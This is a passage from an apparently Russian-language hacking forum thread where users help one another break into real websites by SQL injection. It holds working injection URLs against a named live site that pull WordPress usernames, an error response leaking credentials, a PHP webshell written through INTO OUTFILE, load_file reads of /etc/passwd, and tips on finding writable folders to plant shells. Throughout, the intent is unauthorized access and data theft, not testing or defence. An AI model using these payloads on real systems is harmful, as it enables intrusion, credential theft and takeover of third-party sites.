Если очень постараться, то можно раскрутить 5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2 так что дерзай
И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке: Code: HTTP/1.1 500 Internal Server Error Date: Sat, 10 Mar 2012 09:07:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9201 <html> <head> <title>Conversione non riuscita durante la conversione del valore nvarchar 'u:[email protected]' nel tipo di dati int.</title> <style> но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
HTTP/1.1 500 Internal Server Error Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.
Code: http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1-- Так выводит, а так нет... Code: http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1-- Как вывести? P.S: использовать функции ASCII() и CHAR?
выручайте! есть рут доступ к phpmyadmin. мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой: когда я пишу код Code: SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/dir/name/shell.php' где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут. решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/ туда все спокойно льется, только понять где находится заветный php файл мне не удается. Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю
aydin-ka, в другой базе твоя таблица. Узнаем вот так: Code: http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+information_schema.tables+where+table_name='wp_users'),3--+ Теперь выводит логин: Code: http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f stan0009, Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.
Ereee меня вот что удивляет что захожу из под root а пишет что нет доступа( в чем прикол понятия не имею. Всмысле которые в корне(/tmp/) или которые например в /home/site/dir/tmp/ ?
В /home/site/dir/tmp/. У тебя рут-доступ на MYSQL-сервере, полный доступ над целевой системой у тебя нет.
Если у тебя русскоязычный сайт и File_priv = Y, то проверь на всякий случай главную страницу на код сапы. PHP: load_file('полный_путь/index.html') Если повезет, то у тебя будет папка с правами 777. (Спасибо faza02 за этот интересный выход из положения, когда казалось, что нет папок для заливки шелла )
^ || Error in syntax видимо дело дрянь а стоп. команда то наверно не такая я то пишу команду load_file прямым текстом а как надо? Не очень то вы активные) пишите в личку чтоле, чтобы много мне не писать) как быть? пишу select load_file('/etc/passwd'); отображается BLOB и размер файла. других способов не знаю
заюзал споинт и ты крут,молодчик,иди домой пасси гусей спрашиволось а расскрутке,а не через другой способ лол
подкиньте название какой-нибудь проги для дампа mysql таблицы через schema,SIPT 4 не смог,хотя ручками все ок
в общем есть таблицы, havij их вроде хавает при get, но не выдает в левой колонке - а там все нужное. как открыть скрытое? uname есть ид есть, мейл есть, pass скрыта) спасибо.
